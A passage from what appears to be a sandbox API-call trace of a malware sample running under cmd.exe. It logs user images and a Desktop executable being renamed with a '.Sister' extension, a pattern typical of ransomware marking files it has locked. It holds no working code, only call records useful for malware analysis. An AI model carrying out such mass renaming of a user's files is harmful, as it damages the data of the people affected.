(lpFileName="hx6X83DtmMlRtgH7hUE7.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\hx6x83dtmmlrtgh7hue7.jpg")) returned 0x20 [0293.451] GetProcessHeap () returned 0x21ed8c70000 [0293.451] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92b0790 [0293.452] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92b07a0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.452] SetErrorMode (uMode=0x0) returned 0x0 [0293.452] SetErrorMode (uMode=0x1) returned 0x0 [0293.452] GetFullPathNameW (in: lpFileName="hx6X83DtmMlRtgH7hUE7.jpg", nBufferLength=0x7fe7, lpBuffer=0x21ed989fa40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\hx6X83DtmMlRtgH7hUE7.jpg", lpFilePart=0xa6cf4fd660*="hx6X83DtmMlRtgH7hUE7.jpg") returned 0x31 [0293.452] SetErrorMode (uMode=0x0) returned 0x1 [0293.452] GetProcessHeap () returned 0x21ed8c70000 [0293.452] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5c150 [0293.453] _wcsicmp (_String1="hx6X83DtmMlRtgH7hUE7.jpg", _String2=".") returned 58 [0293.453] _wcsicmp (_String1="hx6X83DtmMlRtgH7hUE7.jpg", _String2="..") returned 58 [0293.453] GetFileAttributesW (lpFileName="hx6X83DtmMlRtgH7hUE7.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\hx6x83dtmmlrtgh7hue7.jpg")) returned 0x20 [0293.453] ??_V@YAXPEAX@Z () returned 0x1 [0293.453] malloc (_Size=0xffce) returned 0x21ed989fa40 [0293.453] ??_V@YAXPEAX@Z () returned 0x21ed989fa40 [0293.453] malloc (_Size=0xffce) returned 0x21ed98afa20 [0293.453] ??_V@YAXPEAX@Z () returned 0x21ed98afa20 [0293.453] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\hx6X83DtmMlRtgH7hUE7.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\hx6x83dtmmlrtgh7hue7.jpg")) returned 0x20 [0293.453] malloc (_Size=0xffce) returned 0x21ed98bfa00 [0293.454] ??_V@YAXPEAX@Z () returned 0x21ed98bfa00 [0293.454] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\hx6X83DtmMlRtgH7hUE7.jpg", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5b530, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5b530) returned 0x21ed8cc7600 [0293.454] malloc (_Size=0xffce) returned 0x21ed98cf9e0 [0293.454] ??_V@YAXPEAX@Z () returned 0x21ed98cf9e0 [0293.455] ??_V@YAXPEAX@Z () returned 0x1 [0293.455] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\hx6X83DtmMlRtgH7hUE7.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\hx6x83dtmmlrtgh7hue7.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\hx6X83DtmMlRtgH7hUE7.jpg.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\hx6x83dtmmlrtgh7hue7.jpg.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0293.465] FindNextFileW (in: hFindFile=0x21ed8cc7600, lpFindFileData=0x21ed8d5b530 | out: lpFindFileData=0x21ed8d5b530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ccb9550, ftCreationTime.dwHighDateTime=0x1d5e61d, ftLastAccessTime.dwLowDateTime=0x90942140, ftLastAccessTime.dwHighDateTime=0x1d5e4b8, ftLastWriteTime.dwLowDateTime=0x90942140, ftLastWriteTime.dwHighDateTime=0x1d5e4b8, nFileSizeHigh=0x0, nFileSizeLow=0x6a01, dwReserved0=0x0, dwReserved1=0x0, cFileName="hx6X83DtmMlRtgH7hUE7.jpg", cAlternateFileName="")) returned 0 [0293.466] GetLastError () returned 0x12 [0293.466] FindClose (in: hFindFile=0x21ed8cc7600 | out: hFindFile=0x21ed8cc7600) returned 1 [0293.466] ??_V@YAXPEAX@Z () returned 0x1 [0293.466] ??_V@YAXPEAX@Z () returned 0x1 [0293.466] ??_V@YAXPEAX@Z () returned 0x1 [0293.466] ??_V@YAXPEAX@Z () returned 0x1 [0293.466] GetProcessHeap () returned 0x21ed8c70000 [0293.466] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc8440 [0293.466] GetProcessHeap () returned 0x21ed8c70000 [0293.466] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95580, Size=0x16) returned 0x21ed8c958a0 [0293.467] GetProcessHeap () returned 0x21ed8c70000 [0293.467] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c958a0) returned 0x16 [0293.467] GetProcessHeap () returned 0x21ed8c70000 [0293.467] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45dd0, Size=0x20) returned 0x21ed8d45c50 [0293.467] GetProcessHeap () returned 0x21ed8c70000 [0293.467] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45c50) returned 0x20 [0293.467] GetProcessHeap () returned 0x21ed8c70000 [0293.467] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6b400 [0293.467] GetProcessHeap () returned 0x21ed8c70000 [0293.467] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6b400, Size=0xb2) returned 0x21ed937c530 [0293.467] GetProcessHeap () returned 0x21ed8c70000 [0293.467] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937c530) returned 0xb2 [0293.467] GetProcessHeap () returned 0x21ed8c70000 [0293.467] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92c0780 [0293.468] GetProcessHeap () returned 0x21ed8c70000 [0293.468] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92c0780, Size=0x30) returned 0x21ed92c0780 [0293.468] GetProcessHeap () returned 0x21ed8c70000 [0293.468] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92c0780) returned 0x30 [0293.468] GetProcessHeap () returned 0x21ed8c70000 [0293.468] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92c07c0 [0293.468] malloc (_Size=0x1ff9c) returned 0x21ed989fa40 [0293.468] GetProcessHeap () returned 0x21ed8c70000 [0293.468] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937cd70 [0293.468] GetProcessHeap () returned 0x21ed8c70000 [0293.468] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937bdb0 [0293.468] ??_V@YAXPEAX@Z () returned 0x1 [0293.468] malloc (_Size=0x1ff9c) returned 0x21ed989fa40 [0293.468] GetProcessHeap () returned 0x21ed8c70000 [0293.468] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937b270 [0293.468] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed989fa40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0293.469] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6af90, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7e40 [0293.469] FindClose (in: hFindFile=0x21ed8cc7e40 | out: hFindFile=0x21ed8cc7e40) returned 1 [0293.469] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6af90, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7840 [0293.469] FindClose (in: hFindFile=0x21ed8cc7840 | out: hFindFile=0x21ed8cc7840) returned 1 [0293.469] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6af90, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc75a0 [0293.469] FindClose (in: hFindFile=0x21ed8cc75a0 | out: hFindFile=0x21ed8cc75a0) returned 1 [0293.470] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6af90, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0293.470] malloc (_Size=0x1ff9c) returned 0x21ed98bf9f0 [0293.470] ??_V@YAXPEAX@Z () returned 0x21ed98bf9f0 [0293.470] GetProcessHeap () returned 0x21ed8c70000 [0293.470] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67630 [0293.470] ??_V@YAXPEAX@Z () returned 0x1 [0293.470] ??_V@YAXPEAX@Z () returned 0x1 [0293.470] GetProcessHeap () returned 0x21ed8c70000 [0293.470] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92c07c0, Size=0x490) returned 0x21ed92c07c0 [0293.471] GetProcessHeap () returned 0x21ed8c70000 [0293.471] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92c07c0) returned 0x490 [0293.471] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0293.471] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.471] GetFileType (hFile=0x50) returned 0x2 [0293.471] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.471] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0293.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.473] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0293.483] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.483] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.483] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0293.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.483] GetFileType (hFile=0x50) returned 0x2 [0293.484] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.484] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0293.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.484] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x19) returned 1 [0293.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.485] GetFileType (hFile=0x50) returned 0x2 [0293.485] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.485] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.485] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed92c0790*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed92c0790*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0293.487] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0293.487] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.487] GetFileType (hFile=0x50) returned 0x2 [0293.487] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.487] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0293.487] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.487] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0293.492] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0293.492] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.492] GetFileType (hFile=0x50) returned 0x2 [0293.492] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.492] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.493] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.493] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0293.500] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.501] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.501] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.501] malloc (_Size=0xffce) returned 0x21ed989fa40 [0293.501] ??_V@YAXPEAX@Z () returned 0x21ed989fa40 [0293.501] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.501] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.501] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.501] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.501] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.501] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.501] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.501] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.501] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.501] ??_V@YAXPEAX@Z () returned 0x1 [0293.501] GetProcessHeap () returned 0x21ed8c70000 [0293.501] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5fe40 [0293.502] GetProcessHeap () returned 0x21ed8c70000 [0293.502] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5fe40, Size=0x130) returned 0x21ed8d580e0 [0293.502] GetProcessHeap () returned 0x21ed8c70000 [0293.502] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d580e0) returned 0x130 [0293.502] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.502] malloc (_Size=0xffce) returned 0x21ed989fa40 [0293.502] ??_V@YAXPEAX@Z () returned 0x21ed989fa40 [0293.502] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.502] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed989fa40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0293.504] ??_V@YAXPEAX@Z () returned 0x1 [0293.504] GetProcessHeap () returned 0x21ed8c70000 [0293.504] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d57aa0 [0293.504] GetProcessHeap () returned 0x21ed8c70000 [0293.504] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f000 [0293.504] GetProcessHeap () returned 0x21ed8c70000 [0293.504] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f000, Size=0x130) returned 0x21ed8d566a0 [0293.504] GetProcessHeap () returned 0x21ed8c70000 [0293.504] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d566a0) returned 0x130 [0293.504] malloc (_Size=0xffce) returned 0x21ed989fa40 [0293.504] ??_V@YAXPEAX@Z () returned 0x21ed989fa40 [0293.504] GetProcessHeap () returned 0x21ed8c70000 [0293.505] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7900 [0293.505] GetProcessHeap () returned 0x21ed8c70000 [0293.505] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5b790 [0293.505] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.505] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.505] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.505] GetLastError () returned 0x2 [0293.505] GetProcessHeap () returned 0x21ed8c70000 [0293.505] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92c0c60 [0293.505] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92c0c70 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.505] SetErrorMode (uMode=0x0) returned 0x0 [0293.505] SetErrorMode (uMode=0x1) returned 0x0 [0293.505] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed989fa40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0293.505] SetErrorMode (uMode=0x0) returned 0x1 [0293.506] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0293.506] GetProcessHeap () returned 0x21ed8c70000 [0293.506] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5c630 [0293.506] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.506] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.506] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.506] GetLastError () returned 0x2 [0293.506] ??_V@YAXPEAX@Z () returned 0x1 [0293.506] malloc (_Size=0xffce) returned 0x21ed989fa40 [0293.506] ??_V@YAXPEAX@Z () returned 0x21ed989fa40 [0293.506] malloc (_Size=0xffce) returned 0x21ed98afa20 [0293.506] ??_V@YAXPEAX@Z () returned 0x21ed98afa20 [0293.506] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.507] GetLastError () returned 0x2 [0293.507] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.507] GetFileType (hFile=0x54) returned 0x2 [0293.507] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0293.507] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0293.507] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.507] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0293.508] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.508] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.508] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0293.515] longjmp () [0293.516] ??_V@YAXPEAX@Z () returned 0x1 [0293.516] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1aaac0, ftCreationTime.dwHighDateTime=0x1d5e299, ftLastAccessTime.dwLowDateTime=0xdec32e50, ftLastAccessTime.dwHighDateTime=0x1d5e94b, ftLastWriteTime.dwLowDateTime=0xdec32e50, ftLastWriteTime.dwHighDateTime=0x1d5e94b, nFileSizeHigh=0x0, nFileSizeLow=0xeb27, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="k8h31.jpg", cAlternateFileName="")) returned 1 [0293.516] GetProcessHeap () returned 0x21ed8c70000 [0293.516] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72790, Size=0x13a) returned 0x21ed8c72790 [0293.516] GetProcessHeap () returned 0x21ed8c70000 [0293.516] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72790) returned 0x13a [0293.516] GetProcessHeap () returned 0x21ed8c70000 [0293.516] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92d0c50 [0293.516] GetProcessHeap () returned 0x21ed8c70000 [0293.516] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92d0c50, Size=0x30) returned 0x21ed92d0c50 [0293.517] GetProcessHeap () returned 0x21ed8c70000 [0293.517] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92d0c50) returned 0x30 [0293.517] GetProcessHeap () returned 0x21ed8c70000 [0293.517] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92d0c90 [0293.517] malloc (_Size=0x1ff9c) returned 0x21ed98bfa00 [0293.518] GetProcessHeap () returned 0x21ed8c70000 [0293.518] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45dd0 [0293.518] ??_V@YAXPEAX@Z () returned 0x1 [0293.518] GetProcessHeap () returned 0x21ed8c70000 [0293.518] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92d0c90, Size=0x110) returned 0x21ed92d0c90 [0293.518] GetProcessHeap () returned 0x21ed8c70000 [0293.518] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92d0c90) returned 0x110 [0293.518] GetProcessHeap () returned 0x21ed8c70000 [0293.518] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92d0db0 [0293.518] GetProcessHeap () returned 0x21ed8c70000 [0293.518] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92d0db0, Size=0x290) returned 0x21ed92d0db0 [0293.518] GetProcessHeap () returned 0x21ed8c70000 [0293.518] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92d0db0) returned 0x290 [0293.518] GetProcessHeap () returned 0x21ed8c70000 [0293.518] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92d1050 [0293.518] GetProcessHeap () returned 0x21ed8c70000 [0293.518] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92d1050, Size=0x30) returned 0x21ed92d1050 [0293.518] GetProcessHeap () returned 0x21ed8c70000 [0293.518] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92d1050) returned 0x30 [0293.519] GetProcessHeap () returned 0x21ed8c70000 [0293.519] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92d1090 [0293.519] malloc (_Size=0x1ff9c) returned 0x21ed98bfa00 [0293.519] GetProcessHeap () returned 0x21ed8c70000 [0293.519] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45bf0 [0293.519] 